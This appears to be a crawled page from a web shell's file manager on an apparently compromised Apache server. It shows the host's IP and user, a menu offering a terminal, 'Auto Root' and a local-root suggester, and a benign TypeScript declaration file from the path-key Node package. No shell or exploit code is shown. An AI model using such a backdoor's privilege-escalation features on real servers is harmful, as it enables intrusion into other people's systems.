Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
path-key /
Delete
Unzip
Name
Size
Permission
Date
Action
dhnodejsBundle.cjs
275
B
-rw-r--r--
2023-04-28 03:08
index.d.ts
730
B
-rw-r--r--
2023-04-28 03:08
index.js
263
B
-rw-r--r--
2023-04-28 03:08
package.json
1017
B
-rw-r--r--
2023-04-28 03:08
pkgjs-lock.json
322
B
-rw-r--r--
2023-04-28 03:08
Save
Rename
export interface Options { /** Use a custom environment variables object. Default: [`process.env`](https://nodejs.org/api/process.html#process_process_env). */ readonly env?: Record<string, string | undefined>; /** Get the PATH key for a specific platform. Default: [`process.platform`](https://nodejs.org/api/process.html#process_process_platform). */ readonly platform?: NodeJS.Platform; } /** Get the [PATH](https://en.wikipedia.org/wiki/PATH_(variable)) environment variable key cross-platform. @example ``` import pathKey from 'path-key'; const key = pathKey(); //=> 'PATH' const PATH = process.env[key]; //=> '/usr/local/bin:/usr/bin:/bin' ``` */ export default function pathKey(options?: Options): string;